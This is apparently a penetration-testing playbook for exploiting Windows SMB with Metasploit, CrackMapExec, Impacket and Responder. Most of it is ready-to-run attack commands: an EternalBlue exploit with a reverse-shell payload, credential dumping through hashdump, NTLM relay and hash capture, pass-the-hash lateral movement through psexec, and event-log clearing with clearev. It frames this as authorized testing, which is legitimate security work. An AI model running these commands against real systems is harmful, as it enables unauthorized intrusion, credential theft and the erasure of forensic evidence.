--- name: exploiting-smb-vulnerabilities-with-metasploit description: 'Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks. ' domain: cybersecurity subdomain: network-security tags: - network-security - smb - metasploit - exploitation - eternalblue version: '1.0' author: mahipal license: Apache-2.0 nist_csf: - PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02 --- # Exploiting SMB Vulnerabilities with Metasploit ## When to Use - Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests - Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying - Validating that patch management processes have addressed known SMB vulnerabilities - Assessing SMB signing enforcement and share permission configurations across the domain - Testing network segmentation by attempting SMB exploitation across VLAN boundaries **Do not use** against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment. ## Prerequisites - Metasploit Framework 6.x installed (`msfconsole --version`) - Authorized penetration test scope document listing target IP ranges and approved attack types - Network access to target SMB services (TCP 445, TCP 139) - CrackMapExec and Impacket tools installed for complementary SMB testing - Valid test credentials or credential wordlists approved for the engagement - Kali Linux or equivalent testing platform ## Workflow ### Step 1: Enumerate SMB Services and Versions ```bash # Discover hosts with SMB open using Nmap nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24 # Enumerate SMB versions and OS information nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24 # Use CrackMapExec for rapid SMB enumeration crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt # Check SMB signing status (disabled = vulnerable to relay) crackmapexec smb 10.10.0.0/24 --smb-signing # Enumerate shares with null session crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares ``` ### Step 2: Scan for Known SMB Vulnerabilities ```bash # Start Metasploit and scan for MS17-010 (EternalBlue) msfconsole -q msf6> use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt msf6 auxiliary(smb_ms17_010)> set THREADS 10 msf6 auxiliary(smb_ms17_010)> run # Scan for MS08-067 (Conficker vulnerability) msf6> use auxiliary/scanner/smb/ms08_067_check msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt msf6 auxiliary(ms08_067_check)> run # Check for SMBGhost (CVE-2020-0796) nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24 # Check for PrintNightmare (CVE-2021-34527) crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare ``` ### Step 3: Exploit EternalBlue (MS17-010) ```bash msf6> use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23 msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99 msf6 exploit(ms17_010_eternalblue)> set LPORT 4444 msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3 msf6 exploit(ms17_010_eternalblue)> exploit # Post-exploitation -- verify access level meterpreter> getuid # Server username: NT AUTHORITY\SYSTEM meterpreter> sysinfo meterpreter> ipconfig meterpreter> hashdump ``` ### Step 4: Perform SMB Relay Attack ```bash # Identify hosts without SMB signing (from Step 1) # Set up NTLM relay with Impacket sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i # Trigger authentication from a compromised host or via phishing # From Meterpreter session on a compromised host: meterpreter> shell C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password # Or use Metasploit's SMB relay module msf6> use exploit/windows/smb/smb_relay msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30 msf6 exploit(smb_relay)> set LHOST 10.10.1.99 msf6 exploit(smb_relay)> exploit # Use responder to capture NTLM hashes for offline cracking sudo responder -I eth0 -wrfv ``` ### Step 5: Pass-the-Hash and Lateral Movement via SMB ```bash # Extract hashes from compromised system meterpreter> hashdump # Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42::: # Use pass-the-hash with CrackMapExec crackmapexec smb 10.10.0.0/24 -u Administrator \ -H e19ccf75ee54e06b06a5907af13cef42 --shares # Execute commands via pass-the-hash crackmapexec smb 10.10.5.30 -u Administrator \ -H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname" # Use Impacket psexec for interactive shell impacket-psexec Administrator@10.10.5.30 \ -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 # Use Metasploit psexec module msf6> use exploit/windows/smb/psexec msf6 exploit(psexec)> set RHOSTS 10.10.5.30 msf6 exploit(psexec)> set SMBUser Administrator msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(psexec)> set LHOST 10.10.1.99 msf6 exploit(psexec)> exploit ``` ### Step 6: Document Findings and Clean Up ```bash # Document all compromised systems and access levels # In Meterpreter, screenshot desktops for evidence meterpreter> screenshot # List accessible shares and sensitive data meterpreter> shell C:\> net share C:\> dir \\10.10.5.30\C$\Users\ /s /b # Clean up -- remove any artifacts meterpreter> clearev meterpreter> shell C:\> del /f C:\Windows\Temp\payload.exe # Close all sessions msf6> sessions -K # Verify cleanup crackmapexec smb 10.10.5.23 -u Administrator -H -x "dir C:\Windows\Temp\payload*" ``` ## Key Concepts | Term | Definition | |------|------------| | **EternalBlue (MS17-010)** | Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers | | **SMB Signing** | Cryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts | | **Pass-the-Hash** | Authentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash | | **NTLM Relay** | Attack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user | | **PsExec** | Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM | | **Null Session** | Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems | ## Tools & Systems - **Metasploit Framework**: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing - **CrackMapExec**: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks - **Impacket**: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction - **Responder**: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior - **enum4linux-ng**: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts ## Common Scenarios ### Scenario: Internal Penetration Test Targeting Windows Domain via SMB **Context**: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts. **Approach**: 1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec 2. Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied 3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access 4. Extract local administrator password hash using hashdump and discover password reuse across 47 hosts 5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database 6. Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks 7. Document the complete attack chain showing how one unpatched system led to full domain compromise **Pitfalls**: - EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems - Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement - Performing hashdump on domain controllers with large databases can cause performance degradation - Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available ## Output Format ``` ## SMB Vulnerability Assessment Report **Engagement**: Internal Penetration Test **Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM) **SMB Hosts Discovered**: 187 ### Critical Findings **Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts** - Severity: Critical (CVSS 9.8) - Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others) - Impact: Remote code execution as SYSTEM without authentication - Exploited: Yes - gained SYSTEM on 10.10.5.23 - Remediation: Apply MS17-010 patch, disable SMBv1 **Finding 2: SMB Signing Disabled - 155/187 Hosts** - Severity: High (CVSS 7.5) - Impact: NTLM relay attacks allow credential forwarding - Exploited: Yes - relayed domain admin credentials - Remediation: Enable SMB signing via Group Policy **Finding 3: Local Admin Password Reuse - 47 Hosts** - Severity: High (CVSS 7.2) - Impact: Compromise of one host enables lateral movement to 47 systems - Remediation: Deploy LAPS (Local Administrator Password Solution) ```